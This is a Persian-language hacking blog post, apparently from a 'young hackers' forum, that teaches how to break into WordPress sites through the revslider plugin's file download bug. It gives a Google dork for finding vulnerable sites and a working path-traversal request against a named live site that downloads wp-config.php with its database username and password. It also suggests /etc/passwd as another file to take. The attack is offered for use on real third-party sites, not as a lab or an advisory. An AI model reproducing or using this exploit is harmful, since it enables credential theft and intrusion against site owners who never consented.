هکرهای جوان

انجمن هکرهای جوان

هکرهای جوان

انجمن هکرهای جوان

هکرهای جوان

این وبلاگ و یا انجمن کوچیک برای آموزش و تبادل نظر و تبادل اطلاعات بین هکرهای جوان عزیز میباشد.

طبقه بندی موضوعی
بایگانی

سلام دوستان امروز میخوایم یک سایت وردپرسی را با پلاگین revslider هک کنیم

باگی که این پلاگین داره   :      local file download

دورک گوگل  :   revslider.php "index of"

خب دوستان ما با استفاده از این باگ میتونیم هر فایلی که بخوایم دانلود کنیم ما اینجا میخوایم فایل wp-config.php  را دانلود کنیم همونطور که میدونید این فایل حاوی یوزر و پسورد دیتابیس سایت هست 

خب حالا یک سایت را باز میکنیم مثلا من سایت زیر را باز کردم:

http://partotaprayan.ir/wp-content/plugins/revslider

خب حالا ادرس را به این تغییر میدیم:

http://partotaprayan.ir/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

خب حالا اگر اینتر کنیم فایل wp-config.php دانلود میشه به جای این فایل میتونیم فایل etc/passwd

نظرات  (۱)

لطفا با پرسش و پاسخ و نظرات خود ما را خوشحال کنید و در این راه دشوار ما را همراهی کنید

VIRUS Nero 007 http://attacker.blog.ir
ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
شما میتوانید از این تگهای html استفاده کنید:
<b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
تجدید کد امنیتی